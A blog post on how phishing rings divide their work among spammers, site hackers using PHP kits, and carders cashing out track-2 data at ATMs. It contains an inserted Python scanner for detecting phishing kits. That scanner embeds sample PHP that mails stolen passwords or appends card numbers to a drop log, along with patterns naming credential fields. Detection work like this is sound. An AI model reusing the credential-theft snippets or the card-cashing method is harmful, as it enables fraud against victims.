Lance James is considered to be the foremost expert in Phishing. Having sat on the APWG tech group with him (although I’m sure he couldn’t tell you who I am, which is amusing) and having read his book, I really think there’s a lot more to say about the topic. Now, granted, I used to work for a company that was way more intimately involved in Phishing than his company is, including a lot of things I’d never be able to talk about with him or anyone else for that matter, so I’m not going to hold it against him.
To his credit, he is an expert, and he’s very smart, but he only knows what he’s been exposed to. Let me explain how it actually works, in a real world environment. This is from actual phishers, not from collecting data, mind you. This is fact, not a guess, an estimate or anything I’m speculating on. This is how it actually works:
Firstly, you have to understand Phishing is a business. There are a few big Phishing groups. There’s your Romanians (Eastern Bloc traditional phishers), your Nigerians (419 scammers), and your Koreans. That’s of course not everyone; for instance, one of the Phishers I was able to interview was actually out of Pakistan.
The next part to understand is that there are actually three totally different types of people who do Phishing who make it all possible. Just like the drug trade has farmers, mules, and pushers, phishing has similar components. The first is the spammer. To be successful at Phishing you need someone to harvest email addresses (assuming email is your transport mechanism) and to email the users with the Phishing emails in question. They use either hacked machines or hacked connections to send the vast quantities of emails. Blacklisting them doesn’t help much because they just move on to the next machine once they’re done.
The second phisher is the hacker, who actually finds websites to hack. This isn’t implying that the spammer doesn’t hack; it’s just not their primary function. The hacker generally pays the spammer for their lists and to send the bulk emails. The hacker usually buys canned phishing kits off of the web, which are generally some PHP scripts, and then uses some canned exploit to own a machine. When the machine is properly set up they put their kit online, and it either creates a log which they can come and download once in a while or, more often, it actually emails some anonymous hotmail account with the personal information of the victims. The hacker may try other things, like tricky XSS exploits or installing trojans for future retrieval, but thus far this is not the most common route.
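As an added illustration (my own example, not code from the post or from any kit), here is a defender-side heuristic a web host could run over the PHP files in a webroot to spot the kit behaviour just described: scripts that read posted credential or card fields and then either mail them off or append them to a log file before redirecting to the real site. The sample sources, field names and scoring weights are all constructed for this example.

```python
import re

# Constructed sample PHP sources (not from any real kit). login.php mimics the
# "mail the victim's data to a drop account" variant, log.php the "write a log
# and fetch it later" variant, contact.php is a benign form for comparison.
SAMPLE_FILES = {
    "login.php": """<?php
$u = $_POST["username"]; $p = $_POST["password"];
mail("drop@hotmail.example", "new rez", "u=$u p=$p");
header("Location: https://bank.example/login");
""",
    "contact.php": """<?php
$name = $_POST["name"];
mail("support@shop.example", "Contact form", $name);
""",
    "log.php": """<?php
$fp = fopen("rez.txt", "a");
fwrite($fp, $_POST["ccnum"] . "|" . $_POST["pin"]);
""",
}

# (regex, weight, reason). Weights are an assumption chosen so that a benign
# form (reads input + sends mail) stays below the threshold.
HEURISTICS = [
    (re.compile(r"\$_(?:POST|REQUEST)\b"), 1, "reads form input"),
    (re.compile(r"\bmail\s*\("), 1, "sends mail"),
    (re.compile(r"""\bfopen\s*\([^)]*["']a\+?["']"""), 1, "appends to a file"),
    (re.compile(r"""\$_(?:POST|REQUEST)\[\s*["'](?:pass(?:word|wd)?|pin|cc(?:num|number)?|cvv2?|ssn|card)""",
                re.I), 2, "handles credential/card fields"),
    (re.compile(r"""header\s*\(\s*["']Location:\s*https?://""", re.I), 1, "redirects off-site"),
]
FLAG_THRESHOLD = 3


def score_php_source(src):
    """Return (score, reasons) for one PHP source; higher means more kit-like."""
    score, reasons = 0, []
    for rx, weight, reason in HEURISTICS:
        if rx.search(src):
            score += weight
            reasons.append(reason)
    return score, reasons


def scan_files(files):
    """Map filename -> (score, reasons) for every file at or above the threshold."""
    return {name: (s, r) for name, src in files.items()
            for s, r in [score_php_source(src)] if s >= FLAG_THRESHOLD}


if __name__ == "__main__":
    for name, (score, reasons) in scan_files(SAMPLE_FILES).items():
        print(f"{name}: score {score}: {', '.join(reasons)}")
```

A real deployment would walk the webroot with os.walk and treat a hit as a prompt to pull the file for review, since these patterns are indicators, not proof.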
The last person in the chain is the carder. The carder buys the personal information from the hacker once it has been validated. This information is then imprinted on a credit card blank. With the blank now imprinted, the carder has the tough job of taking the card to an ATM and putting it into the machine. This requires that the machine does not read the first track, but only the second, because information on the second track is phishable, while information on the first track is not generally accessible (or known) by users. Information on the tracks is available here.
This isn’t some high school kids who are just out to make a few bucks. This is in excess of a billion dollar industry, and there are far more technologies in place to monitor and deal with this than most people are aware of. Probably one of the most interesting is the anti-phishing technology that will be built into IE7.0. Netscape already has anti-phishing blacklists built in, which are pulled from Symantec’s blacklists. Firefox is the only one that has not taken a proactive stance against Phishing to date, despite the fact that I’ve talked with them on a number of occasions about how they could help fight it. They consider it to be a user’s choice, and users can download toolbars to fix this. Honestly, if you make people work to be secure, they won’t be. Only by taking it out of the user’s hands will they have any chance of being secure. Education doesn’t work. You heard it here first. (Actually, it turns out that some people agree.)
As I showed in this rather amusing screenshot, your toolbars are only as good as the developer who built them. Anyway, this is way way way too big a topic to go into in one post, but I’ll make a point of discussing this more in the future, since it is so relevant to the problems people are currently facing today.